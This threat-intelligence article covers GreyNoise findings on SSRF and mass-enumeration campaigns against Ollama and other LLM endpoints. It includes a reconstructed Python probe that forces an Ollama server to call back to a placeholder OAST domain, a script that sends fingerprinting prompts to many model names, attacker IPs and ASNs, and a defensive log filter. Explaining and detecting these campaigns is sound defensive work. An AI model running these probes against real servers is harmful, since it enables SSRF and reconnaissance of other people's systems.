Threat Intelligence · January 14, 2026 · 4 min read

Attackers Mapped LLM Endpoints Across 91,000+ Sessions in Mass Recon Campaign

GreyNoise honeypot data reveals coordinated reconnaissance of LLM infrastructure, including Ollama deployments and endpoints for OpenAI, Claude, and Gemini models, capped by an 11-day mass enumeration campaign.

Alex Kowalski

Threat actors systematically probed 73 distinct large language model endpoints between late December and early January, part of a reconnaissance effort spanning more than 91,000 attack sessions, according to new research from GreyNoise. The campaign targeted organizations running Ollama, OpenAI-compatible APIs, and Google Gemini services.

The scale suggests this isn't opportunistic scanning. GreyNoise assessed that the campaign was conducted by professional threat actors building target lists for future exploitation.

Two Distinct Campaigns

GreyNoise's Ollama honeypot infrastructure captured 91,403 attack sessions between October 2025 and January 2026. Analysis revealed two separate operations:

The Christmas SSRF Campaign ran from October through January, with a significant spike during the holiday period: 1,688 sessions in just 48 hours around December 25. Attackers abused Ollama's model-pull functionality as a server-side request forgery (SSRF) vector, injecting malicious registry URLs to force vulnerable servers to open outbound connections to attacker-controlled infrastructure.

The SSRF campaign used ProjectDiscovery's OAST (Out-of-band Application Security Testing) infrastructure to validate successful exploitation. When a vulnerable Ollama instance called back to attacker domains, it confirmed the system was exploitable and reachable.
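
GreyNoise's report doesn't reproduce the raw payloads, but based on the technique described, a probe would look roughly like the sketch below. This is a minimal reconstruction, assuming Ollama's standard /api/pull endpoint; the target host and OAST subdomain are illustrative placeholders, not indicators from the report.

```python
import requests

# Illustrative target: an Ollama server exposed on its default port.
OLLAMA_PULL = "http://target.example.com:11434/api/pull"

# Ollama treats everything before the first slash in a model name as a
# registry host, so pulling this "model" forces the server to open an
# outbound connection to the attacker's OAST domain. A DNS or HTTP
# callback there confirms the instance is reachable and exploitable.
payload = {
    "model": "xxxxxxxx.oast.live/library/fake-model",  # placeholder subdomain
    "stream": False,
}

resp = requests.post(OLLAMA_PULL, json=payload, timeout=15)
print(resp.status_code, resp.text[:200])
```

Older Ollama builds accept a `name` field instead of `model`; either way, it's the out-of-band callback, not the HTTP response, that tells the attacker the probe succeeded.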

The Mass Enumeration Campaign generated 80,469 sessions over 11 days, between December 28, 2025 and January 8, 2026. Two IP addresses methodically tested 73 different model endpoints, probing for OpenAI- and Gemini-compatible API formats.

Targeted models included OpenAI's GPT family, Anthropic's Claude, Meta's Llama, Google's Gemini, DeepSeek, Mistral, Alibaba's Qwen, and xAI's Grok. The attackers weren't looking for one specific deployment—they were mapping everything.

Fingerprinting Queries

The enumeration campaign used distinctive queries to identify active LLM endpoints:

  • "hi" appeared 32,716 times
  • "How many states are there in the United States?" appeared 27,778 times
  • Empty strings and letter-counting queries (like "How many letter r are in strawberry?") were used to fingerprint specific models

These queries test whether an endpoint responds and what model type powers it. Different LLMs answer these questions in characteristic ways, allowing attackers to identify which organizations run which models—useful information for crafting model-specific attacks later.
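
To illustrate, here is a rough sketch of how such enumeration could work against an OpenAI-compatible endpoint. The base URL and model identifiers are illustrative stand-ins for the families named in the report; GreyNoise has not published the attackers' actual tooling.

```python
import requests

BASE_URL = "http://target.example.com/v1/chat/completions"  # illustrative

# Representative model names from the families the report says were probed.
CANDIDATE_MODELS = [
    "gpt-4o", "claude-3-opus", "llama3", "gemini-pro",
    "deepseek-chat", "mistral-large", "qwen2", "grok-1",
]

# Fingerprinting prompts observed in the honeypot traffic.
PROBES = [
    "hi",
    "How many states are there in the United States?",
    "How many letter r are in strawberry?",
]

for model in CANDIDATE_MODELS:
    for prompt in PROBES:
        resp = requests.post(
            BASE_URL,
            json={"model": model,
                  "messages": [{"role": "user", "content": prompt}]},
            timeout=10,
        )
        # A completion means this endpoint serves the model; error bodies
        # and answer style (e.g. the strawberry question, which many models
        # miscount in characteristic ways) help identify the backend.
        print(model, resp.status_code)
```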

Attribution Indicators

Both campaigns show signs of coordinated tooling. Ninety-nine percent of attack sessions shared the same JA4H fingerprint despite originating from 62 different IP addresses across 27 countries. This pattern suggests attackers used VPS infrastructure along with shared automation tools—likely ProjectDiscovery's Nuclei scanner.

The primary attack IPs have concerning histories. The two addresses responsible for the enumeration campaign (45.88.186.70 and 204.76.203.125) are linked to over 200 CVE exploitation campaigns and more than 4 million sensor hits in GreyNoise's database.

These aren't script kiddies. This is infrastructure associated with professional cybercrime operations.

Why Target LLM Infrastructure?

Organizations increasingly deploy LLMs for internal applications, customer service, code generation, and data analysis. Misconfigured deployments can expose sensitive data or provide compute resources attackers can exploit.

Potential attack objectives include:

API key theft: Compromised LLM endpoints may contain API keys for paid services. Attackers harvest these to run their own queries on someone else's bill—or resell access on underground markets.

Data exfiltration: LLMs ingesting enterprise data may respond to crafted prompts with sensitive information. If the deployment lacks proper access controls, attackers can extract training data or connected knowledge bases.

Compute hijacking: Running LLMs is expensive. Attackers targeting exposed Ollama instances could offload their own model inference costs onto compromised infrastructure.

Supply chain attacks: Misconfigured model registries can be poisoned with backdoored models. Organizations that pull models from untrusted sources risk running malicious code.

Defensive Recommendations

GreyNoise recommends several mitigations for organizations running LLM infrastructure:

  1. Restrict model pulls to trusted registries only—don't allow Ollama or similar tools to fetch arbitrary models from the internet

  2. Block OAST callback domains at the DNS level (*.oast.live, *.oast.me, *.oast.online)

  3. Rate-limit suspicious ASNs—AS152194, AS210558, and AS51396 all appeared prominently in attack traffic

  4. Monitor for fingerprinting queries—unusual patterns like repeated "hi" messages or letter-counting questions may indicate reconnaissance (see the log-filter sketch after this list)

  5. Implement egress filtering to prevent SSRF callbacks from reaching attacker infrastructure
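
As a starting point for recommendation 4, the sketch below flags the fingerprinting patterns GreyNoise observed. It assumes a JSON-lines prompt log with hypothetical `prompt` and `client_ip` fields, which you would adapt to whatever your gateway actually emits.

```python
import json
import re
import sys
from collections import Counter

# Fingerprinting prompts associated with the campaign, per GreyNoise.
EXACT_PROBES = {"hi", "how many states are there in the united states?"}
LETTER_COUNT = re.compile(r"how many letters? .{1,20} in ", re.I)

hits = Counter()
for line in sys.stdin:  # e.g. `python flag_recon.py < prompts.jsonl`
    event = json.loads(line)
    prompt = event.get("prompt", "").strip()
    client = event.get("client_ip", "unknown")
    if not prompt or prompt.lower() in EXACT_PROBES or LETTER_COUNT.search(prompt):
        hits[client] += 1

# Repeated probe-style prompts from a single client suggest reconnaissance;
# the threshold here is arbitrary and should be tuned to your traffic.
for client, count in hits.most_common():
    if count >= 10:
        print(f"possible LLM recon from {client}: {count} probe-like prompts")
```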

The full GreyNoise report includes additional technical indicators and JA4 fingerprints for detection.

The Bigger Picture

AI deployments are expanding faster than security practices can keep up. Organizations racing to deploy LLM capabilities often prioritize functionality over hardening. The result is exactly what GreyNoise observed: a growing attack surface that sophisticated actors are systematically cataloging.

Eighty thousand enumeration requests represent investment. Attackers don't map infrastructure at this scale without plans to use that map. Organizations running exposed LLM services should assume they've been cataloged and harden their deployments before exploitation attempts begin.
